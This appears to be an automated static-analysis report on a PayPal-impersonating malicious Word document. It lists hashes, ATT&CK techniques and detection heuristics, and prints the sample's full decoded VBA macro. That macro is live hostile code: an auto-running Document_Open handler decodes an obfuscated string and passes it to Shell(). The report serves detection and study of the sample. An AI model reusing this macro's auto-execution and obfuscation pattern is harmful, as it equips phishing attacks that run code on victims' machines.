Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8009e3c9f430ae71…

MALICIOUS

Office (OLE)

Size: 45.0 KB | Created: 2018-09-18 13:33:00 | Authoring application: Microsoft Office Word | First seen: 2019-05-16
MD5: 0f0d63d34a0356752f7bb2aa5714487d SHA-1: d25ade3175a349fbd505710dd2048cf5280fd491 SHA-256: 8009e3c9f430ae710bef89f6e645050ced2d24cea0bfa9ef16bb80e4d95b8ce3
182 Risk Score

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample contains VBA macros, including a Document_Open macro that uses the Shell() function, indicating malicious intent. The document body impersonates PayPal and requests sensitive personal information under the guise of account verification. The argument passed to Shell() is not stored in clear text; it is reconstructed at run time from an obfuscated string in the extracted macro, so the exact command is not visible in static analysis. The Shell() call likely executes a payload to download further malware or exfiltrate collected data.

Heuristics 5

  • ClamAV: Doc.Malware.Nastjencro-6688356-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Nastjencro-6688356-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    The macro code calls Shell()
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    The macro code contains a Document_Open auto-execution handler
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source) | Size: 3211 bytes
SHA-256: daad79e59b589133c14bbd911235bb775f79e08ee306027cf4228b6c197276b1

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
fp = fpUnDecorateSymbolName("fp")
End Sub

Attribute VB_Name = "filesettings"
Attribute VB_Base = "0{31EFCE23-E780-460F-95A1-ED5DFA41ED7B}{44F18F45-4331-4E26-A352-C92C958B8E18}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub EXIT_SUCCESS_Change()
size_t = filesettings.EXIT_SUCCESS
counter = 100
counter = 99
counter = 98
counter = 97
counter = 96
counter = 95
counter = 94
counter = 93
counter = 92
counter = 91
counter = 90
counter = 89
counter = 88
counter = 87
counter = 86
counter = 85
counter = 84
counter = 83
counter = 82
counter = 81
counter = 80
counter = 79
counter = 78
counter = 0
Shell size_t, 0
End Sub

Private Sub tool_Change()
alignment
End Sub

Attribute VB_Name = "ending"
Function alignment()
filesettings.basedefs = bStackBelowHeap("m(j4)m4fdyuihzuvv4[]fdyuihzuvv4[[ka'mosd'4gilm$}hois'l.4,hoi'mfp{\$'uy:d""xumo4hphou(-'uo-yu""mvsu'o{-jdy'vdgjksvu$,hoi'mfp%]] o(f _ttttttttt1ttttt1tttttt1ttttttt08-unu]]{|hogio:fidmuhh4]] o(f _ttttttttt1ttttt1tttttt1ttttttt08-unu]]|;oip\gilm$]]zoof3))5w9-66w-676-587)(uy(uy-(kj]]{;mgomz\gilm$]]zoof3))5w9-59e-57r-686)(uy(uy-(kj]]{;][[424dao:ksvu4:u'mdjs'l4ghmss4:ksvufgoz4 o(f _zg'jvui-""go|4hogio:fidmuhh4] o(f _zg'jvui-""go]4:ys'jdyhopvu4zsjju'[")
df = 1
On Error Resume Next
df = CInt("2E+10000")
If df = 1 Then
filesettings.EXIT_SUCCESS = filesettings.basedefs
End If
End Function

Attribute VB_Name = "getErrorMessages"
Function bStackBelowHeap(convert)
interrupt = ""
received = 1
print1 received, interrupt, convert
bStackBelowHeap = interrupt
End Function

Function print1(ByRef loadDbgHelp, ByRef condition, ignored)
SIGTERM = Len(ignored)
If loadDbgHelp <= SIGTERM Then
condition = condition + ULONG_PTR(using(Right(Left(ignored, loadDbgHelp), 1)), 4)
loadDbgHelp = loadDbgHelp + 1
print1 loadDbgHelp, condition, ignored
End If
End Function

Function ULONG_PTR(p, info)
If p - info < 1 Then
ULONG_PTR = Right(Left(filesettings.argc, Len(filesettings.argc) + p - info), 1)
Else
ULONG_PTR = Right(Left(filesettings.argc, p - info), 1)
End If
End Function

Function using(callstackArray)
SIGILL = 1
totalfilesize = 1
SIGSYS SIGILL, totalfilesize, callstackArray
using = totalfilesize
End Function
  
Function SIGSYS(ByRef SIGILL, ByRef totalfilesize, callstackArray)
detected = filesettings.argc
SIGTERM = Len(detected)
If SIGILL < SIGTERM Then
    If callstackArray <> Right(Left(detected, SIGILL), 1) Then
    SIGILL = SIGILL + 1
    SIGSYS SIGILL, totalfilesize, callstackArray
    Else
    totalfilesize = SIGILL
    End If
End If
End Function

Attribute VB_Name = "handlers"
Function fpUnDecorateSymbolName(Hardware)
filesettings.tool = Hardware
End Function